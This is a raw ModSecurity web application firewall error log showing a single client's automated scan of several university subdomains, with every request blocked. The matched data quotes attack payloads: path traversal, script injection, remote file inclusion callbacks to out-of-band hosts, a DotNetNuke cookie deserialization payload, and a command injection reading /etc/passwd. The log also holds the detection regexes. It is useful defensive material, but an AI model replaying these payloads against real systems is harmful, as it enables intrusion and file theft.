[tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/src/search.php"] [unique_id "ZO13NsCo-f0AAAeChW0AAAAw"]
[Tue Aug 29 11:42:30.503737 2023] [:error] [pid 1886] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../ found within ARGS:path: /../../Content"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/api/filemanager"] [unique_id "ZO13NsCo-f0AAAdeQ1kAAAAQ"]
[Tue Aug 29 11:42:31.380148 2023] [:error] [pid 1913] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:where. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:where: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/src/search.php"] [unique_id "ZO13N8Co-f0AAAd5nrIAAAAm"]
[Tue Aug 29 11:42:32.364508 2023] [:error] [pid 1924] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26gxc6nwm8hptzhx.oast.site found within TX:1: cjmnbitjmimt14dgn26gxc6nwm8hptzhx.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/adm/krgourl.php"] [unique_id "ZO13OMCo-f0AAAeEDvEAAAAy"]
[Tue Aug 29 11:42:32.364722 2023] [:error] [pid 1920] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26gay3uo49ir4t19.oast.site found within TX:1: cjmnbitjmimt14dgn26gay3uo49ir4t19.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/adm/krgourl.php"] [unique_id "ZO13OMCo-f0AAAeAW6kAAAAu"]
[Tue Aug 29 11:42:32.370577 2023] [:error] [pid 1911] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26g7xpyxwsq5i6q3.oast.site found within TX:1: cjmnbitjmimt14dgn26g7xpyxwsq5i6q3.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/adm/krgourl.php"] [unique_id "ZO13OMCo-f0AAAd3rG0AAAAe"]
[Tue Aug 29 11:42:32.395353 2023] [:error] [pid 1866] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:chapter. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:chapter: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/src/help.php"] [unique_id "ZO13OMCo-f0AAAdKXPgAAAAK"]
[Tue Aug 29 11:42:32.397756 2023] [:error] [pid 1889] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26gkgm88j4uut8xh.oast.site found within TX:1: cjmnbitjmimt14dgn26gkgm88j4uut8xh.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/adm/krgourl.php"] [unique_id "ZO13OMCo-f0AAAdhH0cAAAAB"]
[Tue Aug 29 11:42:32.402899 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26g8h8uthutqtjhu.oast.site found within TX:1: cjmnbitjmimt14dgn26g8h8uthutqtjhu.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/adm/krgourl.php"] [unique_id "ZO13OMCo-f0AAAcoNjEAAAAF"]
[Tue Aug 29 11:42:32.428405 2023] [:error] [pid 1905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at REQUEST_COOKIES:DNNPersonalization. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: MethodName>WriteFile found within REQUEST_COOKIES:DNNPersonalization: <profile><item key=\\x22name1: key1\\x22 type=\\x22System.Data.Services.Internal.ExpandedWrapper`2[[DotNetNuke.Common.Utilities.FileSystemUtils],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089\\x22><ExpandedWrapperOfFileSyst [hostname "journal.unla.ac.id"] [uri "/__"] [unique_id "ZO13OMCo-f0AAAdxUQkAAAAC"]
[Tue Aug 29 11:42:32.440273 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at REQUEST_COOKIES:DNNPersonalization. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: MethodName>WriteFile found within REQUEST_COOKIES:DNNPersonalization: <profile><item key=\\x22name1: key1\\x22 type=\\x22System.Data.Services.Internal.ExpandedWrapper`2[[DotNetNuke.Common.Utilities.FileSystemUtils],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089\\x22><ExpandedWrapperOfFileSyst [hostname "informatika.unla.ac.id"] [uri "/__"] [unique_id "ZO13OMCo-f0AAAcoNjIAAAAF"]
[Tue Aug 29 11:42:32.455230 2023] [:error] [pid 1889] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at REQUEST_COOKIES:DNNPersonalization. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: MethodName>WriteFile found within REQUEST_COOKIES:DNNPersonalization: <profile><item key=\\x22name1: key1\\x22 type=\\x22System.Data.Services.Internal.ExpandedWrapper`2[[DotNetNuke.Common.Utilities.FileSystemUtils],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089\\x22><ExpandedWrapperOfFileSyst [hostname "pusatbahasa.unla.ac.id"] [uri "/__"] [unique_id "ZO13OMCo-f0AAAdhH0gAAAAB"]
[Tue Aug 29 11:42:32.462078 2023] [:error] [pid 1886] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at REQUEST_COOKIES:DNNPersonalization. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: MethodName>WriteFile found within REQUEST_COOKIES:DNNPersonalization: <profile><item key=\\x22name1: key1\\x22 type=\\x22System.Data.Services.Internal.ExpandedWrapper`2[[DotNetNuke.Common.Utilities.FileSystemUtils],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089\\x22><ExpandedWrapperOfFileSyst [hostname "unla.ac.id"] [uri "/__"] [unique_id "ZO13OMCo-f0AAAdeQ1sAAAAQ"]
[Tue Aug 29 11:42:32.483507 2023] [:error] [pid 1885] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at REQUEST_COOKIES:DNNPersonalization. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: MethodName>WriteFile found within REQUEST_COOKIES:DNNPersonalization: <profile><item key=\\x22name1: key1\\x22 type=\\x22System.Data.Services.Internal.ExpandedWrapper`2[[DotNetNuke.Common.Utilities.FileSystemUtils],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089\\x22><ExpandedWrapperOfFileSyst [hostname "ft.unla.ac.id"] [uri "/__"] [unique_id "ZO13OMCo-f0AAAddJsEAAAAh"]
[Tue Aug 29 11:42:33.364190 2023] [:error] [pid 1882] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within XML: file_datafile_name`{}`.pptx| |cat/etc/passwd||a #service_ppt2lp_size720x540"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/main/webservices/additional_webservices.php"] [unique_id "ZO13OcCo-f0AAAdaZP0AAAAM"]
[Tue Aug 29 11:42:33.372782 2023] [:error] [pid 1876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at REQUEST_COOKIES:DNNPersonalization. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: MethodName>WriteFile found within REQUEST_COOKIES:DNNPersonalization: <profile><item key=\\x22name1: key1\\x22 type=\\x22System.Data.Services.Internal.ExpandedWrapper`2[[DotNetNuke.Common.Utilities.FileSystemUtils],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089\\x22><ExpandedWrapperOfFileSyst [hostname "www.unla.ac.id"] [uri "/__"] [unique_id "ZO13OcCo-f0AAAdUc2QAAAAZ"]
[Tue Aug 29 11:42:33.388567 2023] [:error] [pid 1913] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within XML: file_datafile_name`{}`.pptx| |cat/etc/passwd||a #service_ppt2lp_size720x540"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/main/webservices/additional_webservices.php"] [unique_id "ZO13OcCo-f0AAAd5nrgAAAAm"]
[Tue Aug 29 11:42:33.396000 2023] [:error] [pid 1915] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26gzj4dx18ekaf7x.oast.site found within TX:1: cjmnbitjmimt14dgn26gzj4dx18ekaf7x.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/adm/krgourl.php"] [unique_id "ZO13OcCo-f0AAAd7fUcAAAAq"]
[Tue Aug 29 11:42:34.393062 2023] [:error] [pid 1910] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within XML: file_datafile_name`{}`.pptx| |cat/etc/passwd||a #service_ppt2lp_size720x540"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/main/webservices/additional_webservices.php"] [unique_id "ZO13OsCo-f0AAAd230sAAAAI"]
[Tue Aug 29 11:42:34.395340 2023] [:error] [pid 1889] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within XML: file_datafile_name`{}`.pptx| |cat/etc/passwd||a #service_ppt2lp_size720x540"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/main/webservices/additional_webservices.php"] [unique_id "ZO13OsCo-f0AAAdhH0oAAAAB"]
[Tue Aug 29 11:42:34.401875 2023] [:error] [pid 1917] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within XML: file_datafile_name`{}`.pptx| |cat/etc/passwd||a #service_ppt2lp_size720x540"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/main/webservices/additional_webservices.php"] [unique_id "ZO13OsCo-f0AAAd9ULcAAAAr"]
[Tue Aug 29 11:42:34.417316 2023] [:error] [pid 1885] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:file: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/avatar_uploader.pages.inc"] [unique_id "ZO13OsCo-f0AAAddJsQAAAAh"]
[Tue Aug 29 11:42:34.418751 2023] [:error] [pid 1874] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:file: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/avatar_uploader.pages.inc"] [unique_id "ZO13OsCo-f0AAAdSZMYAAAAX"]
[Tue Aug 29 11:42:34.431712 2023] [:error] [pid 1889] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:file: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/avatar_uploader.pages.inc"] [unique_id "ZO13OsCo-f0AAAdhH0sAAAAB"]
[Tue Aug 29 11:42:34.443537 2023] [:error] [pid 1839] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:file: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/avatar_uploader.pages.inc"] [unique_id "ZO13OsCo-f0AAAcvBlMAAAAJ"]
